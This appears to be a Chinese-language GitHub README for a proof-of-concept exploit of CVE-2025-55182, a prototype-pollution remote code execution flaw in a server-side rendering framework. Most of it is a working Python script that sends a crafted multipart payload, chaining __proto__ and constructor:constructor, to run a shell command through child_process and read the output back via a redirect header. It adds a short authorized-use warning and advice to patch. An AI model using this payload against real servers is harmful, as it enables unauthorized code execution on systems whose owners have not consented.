
CVE-2025-55182的概念验证(PoC)漏洞利用,演示了服务器端渲染实现中因原型污染导致的远程代码执行。包含Python漏洞利用脚本和安全建议。
此仓库包含 CVE-2025-55182 的概念验证 (PoC),该漏洞涉及某些服务器端渲染实现中的原型污染导致远程代码执行 (RCE)。
⚠️ 警告: 此 PoC 仅用于教育、研究以及在个人或受控环境中的授权安全测试。未经许可在系统上使用是非法的。
当未经验证的用户输入被注入到内部 JavaScript 对象结构(原型污染)时,就会发生此漏洞。当与特定的执行流程结合时,可能导致任意代码执行。
在此 PoC 中,使用链式属性(如 __proto__ 和 constructor)将污染升级为执行上下文。
下面是 exploit.py,展示了如何利用此漏洞:
import requests
import json
url = "http://localhost:3000"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Next-Action": "x",
}
prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"
files = {
"0": (
None,
json.dumps({
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": '{"then":"$B1337"}',
"_response": {
"_prefix": prefix,
"_formData": {"get": "$1:constructor:constructor"}
}
}),
"application/json",
),
"1": (None, "\"$@0\""),
}
response = requests.post(url, headers=headers, files=files)
print("Headers:", response.headers.get('x-action-redirect'))
python3 exploit.py
确保仅在本地或开发环境中运行此程序。
如果此漏洞影响实际项目,请检查并安装维护者发布的最新安全补丁。
child_process 执行MIT 许可证